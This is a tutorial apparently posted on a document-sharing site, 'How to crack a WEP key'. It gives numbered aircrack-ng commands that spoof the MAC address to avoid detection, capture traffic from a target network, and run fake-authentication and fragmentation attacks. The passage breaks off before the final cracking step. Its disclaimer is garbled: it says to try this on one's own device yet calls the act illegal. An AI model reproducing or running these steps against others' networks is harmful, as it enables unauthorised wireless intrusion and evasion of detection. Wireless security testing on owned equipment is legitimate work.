Please try this with your own wireless network device, this is against the law and could suffer serious damages against you. Raniver HOW TO CRACK A WEP KEY (TUTORIAL) This tutorial tells you a few single steps to crack a WEP key, the wireless device that it’s used is DWL-G122 ver. B1 on Ubuntu 9.04 (Linux) Before you can use the sentences in this tutorial, install with the synaptic source manager, AIRCRACK-NG and MACCHANGER. Open a new shell and type: 1. airmon-ng, with this you confirm that your device is perfectly connected to your computer, and then you can know the interface and the driver that is using; in this case we use wlan0. 2. airmon-ng stop wlan0, this stops the monitor mode for a while, your device will be disconnected until we can change the MAC address to a faked MAC address. 3. ifconfig wlan0 down, puts the device down 4. macchanger - -mac 00:11:22:33:44:55 wlan0, this change you MAC address for a faked MAC, with this we can prevent our device to be detected.
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.
Raniver
HOW TO CRACK A WEP KEY (TUTORIAL)
This tutorial tells you a few single steps to crack a WEP key, the wireless device that it’s
used is DWL-G122 ver. B1 on Ubuntu 9.04 (Linux)
Before you can use the sentences in this tutorial, install with the synaptic source manager,
AIRCRACK-NG and MACCHANGER.
Open a new shell and type:
1. airmon-ng, with this you confirm that your device is perfectly connected to your
computer, and then you can know the interface and the driver that is using; in this case
we use wlan0.
2. airmon-ng stop wlan0, this stops the monitor mode for a while, your device will be
disconnected until we can change the MAC address to a faked MAC address.
3. ifconfig wlan0 down, puts the device down
4. macchanger - -mac 00:11:22:33:44:55 wlan0, this change you MAC address for a faked
MAC, with this we can prevent our device to be detected.
Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.
Raniver
5. airmon-ng start wlan0, this turns on your device and it’s connected again on your
computer enabling the monitor mode that is the one who makes that we can detect
wireless signals and crack a wep key fast.
6. airodump-ng wlan0, with this our device it’s going to detect all the wireless signals
around.
TIP: Take the MAC address that you are going to attack and copy it (ctrl + shift + c)
TIP2: When you have the MAC address press (ctrl + c) to terminate the process
airodump.
Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.
Raniver
7. airodump-ng -c "channel" -w "filename" --bssid "MAC" wlan0, this tells the
behavior of the wireless signal that you are going to attack. The data (IVs) will be
captured in a slow way.
TIP: Keep this shell open and maintain your eyes on the #Data
Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.
Raniver
Open a new shell and type:
8. aireplay-ng -1 0 -a "MAC" -h "faked MAC" -e "ESSID" wlan0, this will send an
authentication of the wireless signal to your device, and it’s going to be associated.
9. aireplay-ng -5 -b "MAC" -h "faked MAC" wlan0, this will capture packets from the
wireless signal, and will make a XOR file that permits that we can build a packet with
another sentence that is packetforge-ng.
TIP: When we have a question “use this packet?” just type “y” and intro.